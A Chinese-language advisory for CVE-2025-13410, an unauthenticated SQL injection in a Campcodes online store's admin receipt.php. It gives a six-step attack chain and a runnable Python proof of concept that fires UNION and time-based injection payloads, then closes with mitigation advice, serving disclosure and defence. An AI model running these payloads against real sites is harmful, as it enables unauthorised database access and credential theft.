CVE-2025-13410 Campcodes Retro Basketball Shoes Online Store 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13410

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Campcodes Retro Basketball Shoes Online Store 1.0

漏洞概述

CVE-2025-13410是Campcodes公司开发的Retro Basketball Shoes Online Store 1.0版本中存在的高危SQL注入漏洞。该漏洞位于管理后台的receipt.php文件中，攻击者可以通过操纵tid参数实现SQL注入攻击。由于该漏洞无需认证即可远程利用，且CVSS评分达到7.3分，属于高危漏洞。攻击者利用此漏洞可以未经授权访问数据库中的敏感信息，包括用户数据、订单信息、管理员凭证等，严重威胁系统的机密性和完整性。此外，攻击者还可能通过SQL注入进一步进行数据篡改或破坏，甚至可能在某些配置下实现远程代码执行。

技术细节

该SQL注入漏洞存在于/admin/receipt.php文件中的tid参数处理逻辑中。应用程序在处理用户输入的tid参数时，直接将用户提供的值拼接到SQL查询语句中，而未进行充分的输入验证或使用参数化查询。攻击者可以通过构造恶意的SQL payloads来突破原本的查询逻辑，例如使用UNION SELECT语句获取数据库中的敏感表和字段信息，或使用布尔型、时间型盲注技术逐步提取数据。常见的攻击payload包括：' OR '1'='1 用于绕过认证，UNION SELECT用于联合查询，SUBSTRING或ASCII函数用于盲注数据提取。由于该漏洞属于数字类型参数注入，攻击者需要准确识别参数类型并构造相应的注入语句。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标网站，发现/admin/receipt.php管理接口存在

STEP 2

步骤2

漏洞识别：使用SQL注入测试payload（如单引号'）验证tid参数是否存在SQL注入漏洞

STEP 3

步骤3

信息收集：通过UNION SELECT注入从information_schema获取数据库结构、表名和字段信息

STEP 4

步骤4

数据提取：利用盲注或联合查询技术逐步提取敏感数据，如管理员账号密码、用户订单信息等

STEP 5

步骤5

权限提升：利用获取的管理员凭证登录后台管理系统

STEP 6

步骤6

持久化控制：上传恶意文件或修改系统配置，实现长期远程控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13410 PoC - SQL Injection in /admin/receipt.php
# Target: Campcodes Retro Basketball Shoes Online Store 1.0

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"

# SQL Injection payload for extracting database version
payloads = [
    "1' UNION SELECT NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL-- -",
    "1' UNION SELECT NULL,NULL,NULL,NULL,user(),NULL,NULL,NULL-- -",
    "1' UNION SELECT NULL,NULL,NULL,NULL,database(),NULL,NULL,NULL-- -",
    "1' UNION SELECT NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- -",
    "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- -"
]

print(f"[*] Testing CVE-2025-13410 on {target_url}")
print(f"[*] Target endpoint: {target_url}/admin/receipt.php?tid=1")
print("=" * 60)

for i, payload in enumerate(payloads, 1):
    print(f"\n[Test {i}] Payload: {payload}")
    try:
        url = f"{target_url}/admin/receipt.php"
        params = {"tid": payload}
        response = requests.get(url, params=params, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[+] Response length: {len(response.text)} bytes")
            if "UNION" in payload or "information_schema" in payload:
                if any(keyword in response.text for keyword in ["5.", "root@", "information_schema"]):
                    print("[!] VULNERABLE - SQL injection detected!")
                    print("[!] Extracted data found in response")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

print("\n[*] Testing complete")
print("[*] Note: Manual verification recommended for production environments")

影响范围

Campcodes Retro Basketball Shoes Online Store 1.0

防御指南

临时缓解措施

立即限制对/admin/receipt.php的访问，仅允许授权IP地址访问管理后台。同时在Web应用层部署输入验证机制，对tid参数进行严格的类型检查和特殊字符过滤。建议使用ORM框架或参数化查询彻底消除SQL注入风险点。在修复前可通过Web应用防火墙暂时阻断可疑的SQL注入请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13410
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13410
3 Details https://www.cvedetails.com/cve/CVE-2025-13410/
4 VulDB https://vuldb.com/cve/CVE-2025-13410
5 Link https://github.com/laosijivul/cve/issues/3
6 Link https://vuldb.com/?ctiid.332937
7 Link https://vuldb.com/?id.332937
8 Link https://vuldb.com/?submit.693696
9 Link https://www.campcodes.com/
10 Link https://github.com/laosijivul/cve/issues/3